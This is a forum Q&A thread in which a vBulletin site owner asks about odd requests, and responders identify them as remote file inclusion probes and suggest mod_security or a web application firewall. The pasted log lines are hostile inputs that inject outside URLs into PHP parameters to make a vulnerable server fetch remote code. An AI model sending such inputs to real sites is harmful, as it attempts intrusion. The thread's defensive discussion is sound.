uk1900
asked on
vbulletin security/wierd url request!
hi experts,
for a while my forum become slower every time I get these types of urls
normally they should request a topic number example: (vb/showthread.php?t=987)
but instead they request (vb/showthread.php?t=ANOTH ER_WEIRD_U RL) as it shown in the code option.
my question: does this affect my forum? how can I stop them.
thx
for a while my forum become slower every time I get these types of urls
normally they should request a topic number example: (vb/showthread.php?t=987)
but instead they request (vb/showthread.php?t=ANOTH
my question: does this affect my forum? how can I stop them.
thx
vb/showthread.php?t=http://halloween.fizwig.com/index.htm?
/vb/showthread.php?t=http://schoolpapers.hostinginfive.com/bike.htm?
/vb/showthread.php?t=http://schoolpapers.hostinginfive.com/bike.htm?
/vb/showthread.php?t=http://mattd.myhood.se/bike.htm?
/vb/showthread.php?goto=http://schoolpapers.hostinginfive.com/bike.htm?
/vb/showthread.php?t=3279//modules/xfsection/modify.php?dir_module=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt?????
/vb/showthread.php?t=http://bikelove.hostinginfive.com/bike.htm
ASKER
thx ahoffmann
How can I reject/drop a request?
How can I reject/drop a request?
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
They are trying to see if your application is not validating input and if you have url fopen enabled in php whey will gain access to you system.
Best solutuon to block those exploit attempts is to use apache mod-security. Mod security will successfully block these with the right settings. It's even possible to detect them by user agent which if not masked is libwww, which is perl's web agent. Their scripts doing this are usually perl written.
Best solutuon to block those exploit attempts is to use apache mod-security. Mod security will successfully block these with the right settings. It's even possible to detect them by user agent which if not masked is libwww, which is perl's web agent. Their scripts doing this are usually perl written.
i.g. you cannot
well, you can use a web application firewall to reject/drop such request
> .. does this affect my forum?
if your php scripts use this parameter unvalidated, then it could affect your forum, your data and/or even your whole system